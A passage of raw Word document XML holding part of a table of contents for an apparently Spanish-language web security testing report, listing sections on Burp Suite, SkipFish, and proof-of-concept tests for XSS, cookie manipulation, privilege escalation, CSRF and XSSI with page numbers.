            <w:p w14:paraId="24EEB322" w14:textId="4BBFD5C5" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034156" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>d)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Burp Suite</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034156 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>123</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="745AE6E8" w14:textId="32967479" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034157" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>e)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>SkipFish</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034157 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>130</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="5E593E07" w14:textId="52E280AD" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC1"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034158" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>6.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Pruebas de concepto (POC)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034158 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>134</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="20AD742D" w14:textId="12DE1B3C" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034159" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>a)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>XSS -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034159 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>134</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="394EAFD3" w14:textId="302013A6" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="880"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034160" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>i.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>File Upload XSS -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034160 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>134</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="1ABC0473" w14:textId="01B59F5E" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="880"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034161" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>ii.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>XSS Reflejado -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034161 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>144</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="3A037E9A" w14:textId="104F59B9" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="880"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034162" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>iii.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Xtored XSS</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034162 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>155</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="331CB715" w14:textId="632B2158" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034163" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>b)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Manipulación del estado del cliente</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034163 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>159</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="6FA87200" w14:textId="47AE5EAF" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="880"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034164" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>i.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Elevación de privilegios -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034164 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>159</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="2C2A4DE2" w14:textId="7154E563" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="880"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034165" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>ii.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Manipulación de cookies -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034165 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>162</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="6DFA8F85" w14:textId="103D94BF" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034166" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>c)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Falsificación de solicitudes entre sitios (XSRF/CSFR)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034166 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>168</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="4060D8E7" w14:textId="5B9DD59C" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034167" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>d)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Inclusión de secuencias de comandos entre sitios (XSSI)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034167 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
